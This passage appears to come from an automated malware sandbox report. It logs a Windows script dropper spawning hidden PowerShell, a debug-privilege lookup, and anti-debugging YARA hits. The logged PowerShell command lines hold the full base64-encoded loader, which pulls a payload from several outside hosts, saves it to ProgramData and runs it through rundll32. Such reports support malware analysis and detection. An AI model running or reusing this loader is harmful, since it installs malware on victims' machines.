BAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA==" filepath: powershell	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 16, 2023, 10:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	wscript "C:\Users\test22\AppData\Local\Temp\Nzor.js" ParonymizationRearbitrated EcheletteProtodonatan
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Nzor.js" ParonymizationRearbitrated EcheletteProtodonatan
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQASQBBAE0AdwBBADQAQQBDADQAQQBPAFEAQQAzAEEAQwA0AEEATQBRAEEAMgBBAEQAawBBACIAOwBiAHIAZQBhAGsAOwBOAGUAeAB0AEoAUwA7AH0ATgBlAHgAdABKAFMAOwB9ACAAYwBhAHQAYwBoACAAewAkAEoAbwB1AG4AYwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABZAEEATABnAEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQAxAEEAQQA9AD0AUgBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE8AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBBAEEAMgBBAEMANABBAE0AZwBBADEAQQBEAEUAQQAiADsAfQB9ACQAbQBvAGQAdQBsAGEAcgBpAHoAaQBuAGcAQwByAHUAbgBrAGwAZQAgAD0AIAAzADIANAA7AA=="
parent_process	wscript.exe	martian_process	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABJAG4AYwBvAG0AcAByAGUAaABlAG4AcwBpAGIAbABlAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAMQBBAEQAUQBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABJAEEATQB3AEEAMQBBAEEAPQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBNAHcAQQAzAEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAGMAQQBPAEEAQQA9AGYAYgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAHQAQQBHAEkAQQBjAGcAQgBwAEEARwB3AEEAYgBBAEIAaABBAEcAVQBBAFUAQQBCAGgAQQBHAGsAQQBiAGcAQgAwAEEASABJAEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAHMAQQBHAFUAQQBZAFEAQgB6AEEARwBVAEEAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAZABvAG4AbwByAHMAaABpAHAAUwB1AGIAcABhAHMAdABvAHIAIAA9ACAAIgBtAGEAYwBhAGQAYQBtAGkAdABlAEMAaABvAHIAaQBzAG8AIgA7ACQASgB1AGIAYQByAHQAYQBzAFUAbgBwAHIAaQBuAGMAaQBwAGwAZQBkAGwAeQAgAD0AIAAzADkAMAA7ACQAYQBuAHQAaQByAG8AbQBhAG4AdABpAGMAaQBzAG0ARwBpAGcAYQBuAHQAbwBjAHkAdABlACAAPQAgACIAYQB0AHIAbwBjAGgAYQBsAEcAbAB1AGMAYQB0AGUAIgA7ACQAdQBuAGQAZQByAGMAYQByAHYAZQBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAMQBBAEYAQQBBAFEAdwBCAEcAQQBEAFUAQQBTAHcAQQB6AEEARgBJAEEAeQBhAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBRAEEAdgBBAEUAdwBBAFoAUQBCAHgAQQBDADgAQQBjAEEAQgAwAEEARQBNAEEAUQBnAEEAeABBAEUAawBBAFUAdwBCAFEAQQBHADAAQQBaAGcAQgBsAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcwBwAGUAaQBzAGUAIABpAG4AIAAkAHUAbgBkAGUAcgBjAGEAcgB2AGUAZAAgAC0AcwBwAGwAaQB0ACAAIgB5AGEARwAiACkAIAB7ACQAcwBlAG0AaQBqAHUAYgBpAGwAZQBlAEIAbABvAG8AZABzAHQAcgBlAGEAbQAgAD0AIAAzADQANwA7ACQAYQBkAGkAcABvAG0AZQB0AGUAcgBUAGgAbwBuAGQAcgBhAGMAaQBhAG4AcwAgAD0AIAAiAFUAbgBjAGgAYQByAGcAZQBhAGIAbABlAE0AdQBzAHMAaQBjAGsAIgA7ACQAbQBlAHIAeQBjAGkAcwBtAHUAcwBNAGkAYwByAG8AcwB1AHIAZwBlAHIAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATgBnAEEAMwBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB4AEEARABNAEEATwBBAEEAPQBpAGkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAWgBRAEIAeQBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFoAZwBCADEAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAZABRAEIAeQBBAEcAVQBBAGkAaQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAwAEEAQQA9AD0AaQBpAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABrAEEATABnAEEAeABBAEQARQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQA1AEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAHQAcgBpAHMAbwBtAGUAQwBvAGwAZABuAGUAcwBzACAAPQAgACIAQgBlAGwAbABvAHcAaQBuAGcAIgA7ACQAQgBpAHQAdABlAGQASQBuAHQAZQBnAHIAYQB0AGkAbwBuACAAPQAgADkAOAA2ADsAJAByAHkAZQBnAHIAYQBzAHMAQQBtAGIAYQBzAHMAYQBkAG8AcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAHAAZQBpAHMAZQApACkAOwBpAHcAcgAgACQAcgB5AGUAZwByAGEAcwBzAEEAbQBiAGEAcwBzAGEAZABvAHIAIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABiAGkAcwB5AG4AYwAuAG0AYQBjAGsAaQBuAGIAbwB5ADsAJABNAG8AdABvAHIAbQBlAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAWQBRAEIAdABBAEcAawBBAFoAQQBCAGwAQQBDADQAQQBiAFEAQgBoAEEASABJAEEAYQB3AEIAbABBAEgAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAzAEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAbABBAEcAUQBBAGMAQQBCAHMAQQBHADgAQQBkAEEAQQB1AEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAFcAeQB3AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwBzAEEAYgB3AEIAcwBBAEcAdwBBAGUAUQBBAHUAQQBHAFUAQQBaAEEAQgAxAEEARwBNAEEAWQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBBAD0APQAiADsAJABVAG4AbABlAHYAZQBsAGkAbgBnACAAPQAgADYAMgA3ADsAJABNAHUAdAB0AG8AbgBzAFUAbgBjAGwAZQBhAG4AcwBlAGQAIAA9ACAAIgBNAG8AcgBnAGEAeQBHAGkAbgBnAGUAbAB5ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHMAeQBuAGMALgBtAGEAYwBrAGkAbgBiAG8AeQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA4ADUANQAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABNAEEAZQBRAEIAdQBBAEcATQBBAEwAZwBCAHQAQQBHAEUAQQBZAHcAQgByAEEARwBrAEEAYgBnAEIAaQBBAEcAOABBAGUAUQBBAHMAQQBIAEEAQQBjAGcAQgBwAEEARwA0AEEAZABBAEEANwBBAEUANABBAFoAUQBCADQAQQBIAFEAQQBTAGcAQgBUAEEAQQA9AD0AIgA7ACQARgB1AGQAZABsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQATQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABJAEEATQBnAEEAMgBBAEEAPQA9AHoAZABoAGUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAWQBRAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBkAEEAQgBsAEEASABNAEEAYQBRAEIAdABBAEcARQBBAGIAQQBCAFEAQQBHAGcAQQBaAFEAQgB1AEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAFkAUQBCAGkAQQBBAD0APQAiADsAJABCAHIAbwBnAHUAZQBkACAAPQAgACIAdQBuAGMAbwBuAHMAbwBsAGEAYgBsAHkATwBvAHAAaABvAHIAaQBkAGkAdQBtACIAOwAkAGkAbgBoAG8AbQBvAGcAZQBuAGUAbwB1AHMARABhAGYAZgBhAGQAbwB3AG4AZABpAGwAbABpAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgBqAEEARwBnAEEAYQBRAEIAdwBBAEUAVQBBAGIAUQBCAGkAQQBIAEkAQQBiAHcAQgAzAEEARwBRAEEATABnAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAdQBBAEgAVQBBAFkAZwBCAHAAQQBHAEUAQQBiAEEAQgBzAEEASABrAEEAUQB3AEIAaABBAEcATQBBAGEAQQBCAGwAQQBHADAAQQBhAFEAQgBqAEEAQwA0AEEAZABBAEIAdgBBAEcAcwBBAGUAUQBCAHYAQQBBAD0APQBQAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBNAEEAZQBRAEIAegBBAEgAUQBBAGEAUQBCAHUAQQBIAFUAQQBjAGcAQgBwAEEARwBFAEEAVgBBAEIAaABBAEcAZwBBAFkAUQBCAHMAQQBHAGsAQQBMAGcAQgB0AEEARwA4AEEAYwBnAEIAMABBAEcAYwBBAFkAUQBCAG4AQQBHAFUAQQBQAEwAYQBBAEIAMABBAE